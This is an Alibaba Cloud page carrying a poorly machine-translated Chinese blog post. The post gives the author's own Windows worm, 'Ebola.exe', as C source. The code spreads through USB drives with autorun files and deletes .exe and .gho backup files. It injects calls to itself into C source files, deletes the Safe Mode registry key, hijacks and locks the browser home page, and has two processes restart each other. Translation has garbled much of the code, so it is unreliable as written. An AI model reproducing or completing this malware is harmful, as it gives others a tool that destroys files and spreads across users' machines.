Several APIs are used to implement some cumbersome functions...

Last Update:2018-12-05 Source: Internet

Author: User

Developer on Alibaba Coud: Build your first app with APIs, SDKs, and tutorials on the Alibaba Cloud. Read more ＞

Ebola.exe traverses the hard disk and USB flash drive files. If the suffix is exe, the files are deleted. If the file is c, the stdio. c header file containing the ebloa.exe code is generated under its directory, and its attributes are hidden. Modify the file header <stdio. h> to "stdio. c" and insert malicious functions into the file c. No malicious code has been found for cpp and html. If the suffix is gho, delete the file. modify the Registry: disable security mode, add auto-start, modify and lock the home page, disable viewing hidden files, and shield the suffix of the exe file, when adding an auto-start device, soft blocking may cause a failure. You should try again. If the addition fails, modify the ebloa file name, add a random number after the file name, and re-Add the auto-start device .. scan the hard drive U disk and system32directory every 0.3seconds, and check whether autorun.exe exists. If not, copy from other locations. the folder name is the same as the folder name and copied to the root directory of the USB flash drive. The original folder is set to hidden and autorun is generated under its root directory. inf file. check whether windows/system32/autorun.exe runs every 0.1 seconds. Otherwise, run it and hide its window. autorun.exe after the Mobile Disk is started and disguised as "autorun.exe" of the folder icon, "autorun.exe" appears and hides its window. every seconds, ebola.exe is available in the root directory of each driver and under system32. if no, It is copied elsewhere. check whether ebola.exe under system32runs every 0.3seconds. Otherwise, run it and hide the window. both exe files of the program are hidden and monitored. If the other process is found to be terminated, the program immediately runs the other process again. If the key value of the hidden file can be viewed in the registry is not changed back, the command is not run or other software is not displayed .. many APIs are used to write this object. These APIs are powerful, but they are just a small application .. If you can add some hooks, it will be even more cumbersome .. main program ebola.exe long INFC = 0, INFCPP = 0, INFHTM = 0; void infectC (char * path); void ufilereplace (char * path ); void searchdisk (char * way, int deep, int type) // traversal infected Suffix: gho, c, cpp, htm, html file { WIN32_FIND_DATA f; HANDLE done; char newway [255], bian [255]; DWORD errorcode = 0; strcpy (newway, way); strcat (newway ,"*. * "); done = FindFirstFile (newway, & f); wh Ile (errorcode! = ERROR_NO_MORE_FILES) { if (deep = 7) break; errorcode = GetLastError (); if (errorcode = ERROR_NO_MORE_FILES) break; if (! (F. dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY) { strcpy (bian, way); strcat (bian, f. cFileName); if (strrchr (bian ,'. ')! = NULL) { // if (stricmp (strrchr (bian ,'. '),". gho ") = 0) // gho (bian); // if (stricmp (strrchr (bian ,'. '),". c ") = 0 & stricmp (strrchr (bian, '//')," // stdio. c ") // infectC (bian); /* if (stricmp (strrchr (bian ,'. '),". cpp ") = 0) infectcpp (bian); if (stricmp (strrchr (bian ,'. '),". htm ") = 0 | stricmp (strrchr (bian ,'. '),". html ") = 0) infecthtml (bian); */} } if (stricmp (f. cFileName, "System Volume Information") & stricmp (f. cFileName, "recycled") & stricmp (f. cFileName, "Documents and Settings") & stricmp (f. cFileName, "WINDOWS") & (f. dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY) & strcmp (f. cFileName ,". ") & strcmp (f. cFileName ,".. ") { strcpy (bian, way); strcat (bian, f. cFileName); if (type = 1) ufilereplace (bian); Strcat (bian, "//"); searchdisk (bian, deep + 1, 0 ); } errorcode = GetLastError (); FindNextFile (done, & f ); } CloseHandle (done); } void autorun () // auto start upon startup { char subkey [70] = "SOFTWARE/Microsoft // Windows // CurrentVersion // Run "; char value [50] = "c: // windows // system32 // ebola.exe"; char vname [10] = "ebola "; HKEY hKey; ULONG dType = R EG_SZ, len = 0; RegOpenKeyEx (HKEY_LOCAL_MACHINE, subkey, 0, KEY_SET_VALUE | KEY_QUERY_VALUE, & hKey); if (RegQueryValueEx (hKey, vname, 0, & dType, NULL, & len); RegSetValueEx (hKey, vname, 0, REG_SZ, (const byte *) value, strlen (value) + 1 ); RegCloseKey (hKey); } void safeboot () // blocked security mode { HKEY hKey; RegOpenKeyEx (HKEY_LOCAL_MACHINE, "SYSTEM // CurrentControlSet // Control", 0, KE Y_WRITE, & hKey); SHDeleteKey (hKey, "SafeBoot"); RegCloseKey (hKey ); } void checkautorun () // check whether autorun.exe is running { FILE * p; if (NULL! = (P = fopen ("C: // WINDOWS // system32 // autorun.exe", "rb + "))) { fclose (p); ShellExecute (NULL, "open", "c: // windows // system32 // autorun.exe ", NULL, NULL, SW_HIDE); } void IEmain (char http []) // modify the home page { char subkey [70] = "Software // Microsoft // Internet Explorer // Main "; char vname [20] = "Start Page"; DWORD value = 1; HKEY hKey; ULONG dType = REG_SZ, le N = 0; RegOpenKeyEx (HKEY_CURRENT_USER, subkey, 0, KEY_SET_VALUE | KEY_QUERY_VALUE, & hKey); if (RegQueryValueEx (hKey, vname, 0, & dType, NULL, & len); RegSetValueEx (hKey, vname, 0, REG_SZ, (const byte *) http, strlen (http) + 1 ); RegCloseKey (hKey); strcpy (subkey, "Software // Policies/Microsoft // Internet Explorer/Control Panel "); strcpy (vname, "HomePage"); dType = REG_DWORD; Reg CreateKey (HKEY_CURRENT_USER, "Software // Policies // Microsoft // Internet Explorer // Control Panel", & hKey); // lock the home page RegOpenKeyEx (HKEY_CURRENT_USER, subkey, 0, KEY_SET_VALUE | KEY_QUERY_VALUE, & hKey); if (RegQueryValueEx (hKey, vname, 0, & dType, NULL, & len )); RegSetValueEx (hKey, vname, 0, REG_DWORD, (const byte *) & value, sizeof (DWORD); RegCloseKey (hKey ); } void finddisk () { c Har path [5] = "c: //"; for (; path [0] <= 'Z'; path [0] ++) { if (DRIVE_FIXED = GetDriveType (path) searchdisk (path, 1, 0 ); if (DRIVE_REMOVABLE = GetDriveType (path) searchdisk (path, 1, 1 ); } /* searchdisk ("g: //", 1, 1); searchdisk ("h ://", 1, 1); */ } void Uautorun () // USB flash drive { FILE * p; char path [20] = "c: // autorun. inf "; int I = 0; char file [200] = "[Autorun] open‑autorun.exe shell/open = open (& O) shell/open/command#autorun.exe shell/open/Default = 1 shell/cmde = Resource Manager (& X) shell/cmde/commandereautorun.exe "; p = fopen (path," w "); while (file [I]! = '/0') { if (file [I] = '') fputc ('/N', p ); else fputc (file [I], p); I ++; } fclose (p); } void gho (char * path) // Delete the gho file { remove (path); Sleep (200 ); } void disktype () // copy the autorun.exe file to the udisk { char disk [15] = "c: // ", copy [15] =" c: // ", * p; for (; disk [0] <= 'Z '; disk [0] ++) if (DRIVE_REMOVABLE = GetDriveType (dis K) { strcat (disk, "autorun.exe"); while (DRIVE_FIXED = GetDriveType (copy )) { strcat (copy, "autorun.exe"); CopyFile (copy, disk, TRUE ); p = strrchr (copy, '//'); * (++ p) = '/0 '; copy [0] ++; } p = strrchr (disk ,'//'); * (++ p) = '/0'; strcat (disk, "ebola.exe"); CopyFile ("C: // WINDOWS // system32 // ebola.exe ", disk, TRUE); p = strrchr (disk ,' // '); * (++ p) ='/0'; copy [0] = 'C '; } // modify the name of the exe extension hidden in the registry char subkey [20] = "exefile", code [1] = ""; char vname [20] = "NeverShowExt"; HKEY hKey; ULONG dType = REG_SZ, len = 0; RegOpenKeyEx (HKEY_CLASSES_ROOT, subkey, 0, KEY_SET_VALUE | KEY_QUERY_VALUE, & hKey); if (RegQueryValueEx (hKey, vname, 0, & dType, NULL, & len); RegSetValueEx (hKey, vname, 0, REG_SZ, (CONST BYTE *) Code, 1); RegCloseKey (hKey); } void ufilereplace (char * path) // hide the udisk folder and pass autorun.exe as a folder to the USB flash drive { char * p, disk [100]; FILE * p1; // printf ("% s/n", path); strcpy (disk, path); strcat (disk ,". exe "); if (NULL = (p1 = fopen (disk," r + "))) { CopyFile ("c: // autorun.exe", disk, TRUE); SetFileAttributes (path, 2 ); SetFileAttributes (disk, 8); } else fclose (p1 ); } void checkebola () // check whether autorun.exe exists in the driver. If not, copy it from another drive. { char path [15] = "c: //", copy [15] = "c: // "; char * p; FILE * p1; for (; path [0] <= 'Z '; path [0] ++) if (DRIVE_FIXED = GetDriveType (path) | DRIVE_REMOVABLE = GetDriveType (path )) { strcat (path, "autorun.exe"); if (NULL = fopen (path, "rb + ")) { s Trcat (copy, "autorun.exe"); while (copy [0] <= 'Z' & NULL = (p1 = fopen (copy, "rb +") copy [0] ++; if (copy [0] <= 'Z ') { fclose (p1); CopyFile (copy, path, TRUE ); } } if (NULL = (p1 = fopen ("C: // WINDOWS // system32 // autorun.exe "," rb + ") CopyFile (copy," c: // windows // system32 // autorun.exe ", TRUE); else fclose (p1); p = strrchr (copy ,'//'); * (+ + p) =' /0'; p = strrchr (path, '//'); * (++ p) = '/0 '; copy [0] = 'C'; } void infectC (char * path) // infected file with C extension { char subkey [100] = "SOFTWARE/Microsoft // Windows // CurrentVersion // Explorer // Advanced // Folder // Hidden // SHOWALL "; char vname [20] = "CheckedValue"; DWORD value = 0; HKEY hKey; ULONG dType = REG_DWORD, len = 0; char code [200], * p; FILE * P1, * p2; int I = 0; char ch, head [20]; printf ("% s/n ", path); p1 = fopen (path, "r +"); // modify the C header file, <stdio. h> change to "stdio. c " while (! Feof (p1) { ch = fgetc (p1); if (ch = '(') break; if (ch> = 'A' & ch <= 'Z ') | (ch> = 'A' & ch <= 'Z') { head [I] = ch; I ++; } if (I = 13) { head [I] = '/0'; if (0 = stricmp (head, "includestdioh ")) { fseek (p1,-1, SEEK_CUR); fputc ('C', p1); fseek (p1, -8, SEEK_CUR); fputc ('"', p1); fseek (p1, 7, SEEK_CUR); f Putc ('"', p1); break; } else { I = 0; while (! Feof (p1) { ch = fgetc (p1 ); if (ch = '>' | ch = '(' | ch = '/N') break; } fseek (p1,-1, SEEK_CUR ); } fclose (p1); p1 = p2 = fopen (path, "r +"); while (! Feof (p1) if (fgetc (p1) = '}') p2 = p1; fseek (p2,-1, SEEK_CUR); fputs ("f ();", p2); fputc ('/N', p2 ); fputc ('}', p2); fclose (p2 ); // The c file has been infected // generate stdio in the same directory of the infected C file. c file, and set it to a hidden file strcpy (code, "include stdio. h include windows. h void f ShellExecute NULL, open, C: // WINDOWS // system32 // ebola.exe, NULL, NULL, SW_HIDE ;"); code [0] = '#'; code [8] = '<'; co De [16] = '>'; code [17] = '/N'; code [18] =' # '; code [26] =' <'; code [36] = '>'; code [37] = '/N'; code [44] =' ('; code [45] = ')'; code [46] = '/N'; code [47] =' {'; code [60] =' ('; code [66] = '"'; code [71] = '"'; code [73] = '"'; code [106] = '"'; code [125] = ')'; code [128] = '}'; p = strrchr (path, '//'); * (++ p) = '/0'; strcat (path, "stdio. c "); remove (path); p1 = fopen (path," w "); fputs (code, p1 ); fclose (p 1); SetFileAttributes (path, 2); // modify the registry and disable viewing hidden files RegOpenKeyEx (HKEY_LOCAL_MACHINE, subkey, 0, KEY_SET_VALUE | KEY_QUERY_VALUE, & hKey); if (RegQueryValueEx (hKey, vname, 0, & dType, NULL, & len )); RegSetValueEx (hKey, vname, 0, REG_DWORD, (const byte *) & value, sizeof (DWORD); RegCloseKey (hKey ); INFC ++; Sleep (200); } void infectcpp (char * path) // infect the cpp file { INFCPP ++; Sleep (200); } void infecthtm (char * path) // infect the htm l FILE { FILE * p1, * p2; char code [100]; p1 = fopen (path, "w"); } int main () { // checkebola (); // checkautorun (); // finddisk (); // autorun (); // IEmain ("http://www.fuck.com"); // Uautorun (); // safeboot (); while (1) { // ShellExecu Te (NULL, "open", "F: // 4_1 // Debug // test.exe", NULL, NULL, SW_HIDE); // disktype (); checkebola (); checkautorun (); // check whether the autorun.exe file is deleted. If yes, the file is automatically copied. Sleep (100 ); } return 0; } from program autorun.exe char path [15] = "c ://", copy [15] = "c: //"; FILE * p1; char * p; while (1) { // check whether the ebloa.exe file exists. If the file does not exist, copy it from another drive. for (; path [0] <= 'Z '; path [0] ++) if (DRIVE_FIXED = GetDriveType (path) | DRIVE_REMOVABLE = GetDriveType (path) { strcat (path, "ebola.exe "); if (NULL = (p1 = fopen (path, "rb +") { strcat (copy, "ebola.exe"); while (copy [0] <= 'Z' & NULL = (p1 = fopen (copy, "rb + "))) copy [0] ++; if (copy [0] <= 'Z') { fclose (p1 ); CopyFile (copy, path, TRUE); } else fclose (p1 ); If (NULL = (p1 = fopen ("C: // WINDOWS // system32 // ebola.exe", "rb + "))) { CopyFile (copy, "c: // windows // system32 // ebola.exe", TRUE ); } else fclose (p1); p = strrchr (copy, '//'); * (+ + p) = '/0'; p = strrchr (path ,'//'); * (++ p) = '/0'; copy [0] = 'C '; } // check whether ebola.exe is running if (NULL! = (P1 = fopen ("c: // windows // system32 // ebola.exe", "rb + "))) { fclose (p1); ShellExecute (NULL, "open", "C: // WINDOWS // system32 // ebola.exe ", NULL, NULL, SW_HIDE); } Sleep (100); }

This article is an English version of an article which is originally in the Chinese language on aliyun.com and is provided for information purposes only. This website makes no representation or warranty of any kind, either expressed or implied, as to the accuracy, completeness ownership or reliability of the article or any translations thereof. If you have any concerns or complaints relating to the article, please send an email, providing a detailed description of the concern or complaint, to info-contact@alibabacloud.com. A staff member will contact you within 5 working days. Once verified, infringing content will be removed immediately.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

Get Started for Free

Sales Support

1 on 1 presale consultation

Chat Contact Sales
After-Sales Support

24/7 Technical Support 6 Free Tickets per Quarter Faster Response

Open a Ticket
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.

Learn More

Several APIs are used to implement some cumbersome functions...

Contact Us

A Free Trial That Lets You Build Big!

Sales Support

After-Sales Support